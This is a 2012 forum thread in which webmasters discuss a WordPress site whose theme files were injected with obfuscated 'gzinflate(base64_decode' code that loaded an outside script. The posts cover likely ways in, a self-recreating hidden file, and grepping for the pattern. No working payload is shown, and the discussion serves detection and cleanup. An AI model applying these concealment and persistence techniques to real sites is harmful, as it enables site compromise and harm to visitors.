Welcome to WebmasterWorld Guest from 54.161.64.174

Forum Moderators: rogerd & travelin cat

Message Too Old, No Replies

New Wordpress Hack?

     
1:22 am on Apr 15, 2012 (gmt 0)

WebmasterWorld Administrator rogerd is a WebmasterWorld Top Contributor of All Time 10+ Year Member



A blog I admin triggered a "Trojan.Malscript.html" warning when I loaded its home page with Norton running. I immediately checked Google Webmaster Tools and a number of web-scanners like AVG and others. They all gave the site a clean bill of health. It was still causing Norton to go off, so I looked at the source code.

I found a link to a javascript file hosted on an Australian "organicfoodmarkets" domain. Digging into the theme files, I found that some had been modified to include a line of code that included "gzinflate(base64_decode" followed by a long string. This was translated into the bogus script load code when the page was displayed.

The odd thing was that the files had apparently been modified over a month earlier, and GWT, along with everyone else, didn't catch it. Another machine running TrendMicro let me load the page without objection.

I think this was most likely a server side hack, i.e., via compromised FTP or Wordpress login, vs. some kind of code vulnerability.

So, it's a good idea to keep your eye on file dates and, of course, exercise normal security precautions for logins and passwords. Had it not been for Norton, this might have persisted a lot longer without my knowing it. Checking your files for the base64 code above would disclose an identical exploit, though if the hacker has FTP access any number of nasty things could be done.
2:02 am on Apr 15, 2012 (gmt 0)

WebmasterWorld Senior Member lorax is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



Thanks for the info rogerd. I haven't come across this personally but will be looking out for it now.
2:17 am on Apr 15, 2012 (gmt 0)

WebmasterWorld Administrator incredibill is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



I think this was most likely a server side hack, i.e., via compromised FTP or Wordpress login, vs. some kind of code vulnerability.


Probably got in via Wordpress would be my guess as it's always responsible for some vulnerability somewhere, or even your hosted control panel as there have been some recent vulnerabilities in those as well.

However, if you're on shared hosting, they could've gotten in on any account and escalated privileges and performed that little trick server wide.
5:16 pm on Apr 16, 2012 (gmt 0)

WebmasterWorld Administrator rogerd is a WebmasterWorld Top Contributor of All Time 10+ Year Member



The intrusion seems to be confined to a single domain on that VPS. I had some work done on the site a few days before the files changed, and I'm guessing that there was some vulnerability on the coder's end. Even if he wasn't the source, he may have been hacked himself, had his login compromised, etc.

I deleted the coder's credentials once the work was complete and stable, but the intrusion (whether related or not) happened before that deletion.

Could be a coincidence, of course, and I don't rule out other possible hacks.
11:07 am on May 2, 2012 (gmt 0)



i have a website, i was using word press, But now i have no website because my website was hoicked...
6:37 am on May 3, 2012 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Some more info about base64_decode hacks here-
[webmasterworld.com...]

The one I found on a shared hosting server had a "double secret" key file hidden with a non obvious file extension -- any time the corrupted file was deleted, the second file would replicate it.

Grep is your friend...
 

Featured Threads

Hot Threads This Week

Hot Threads This Month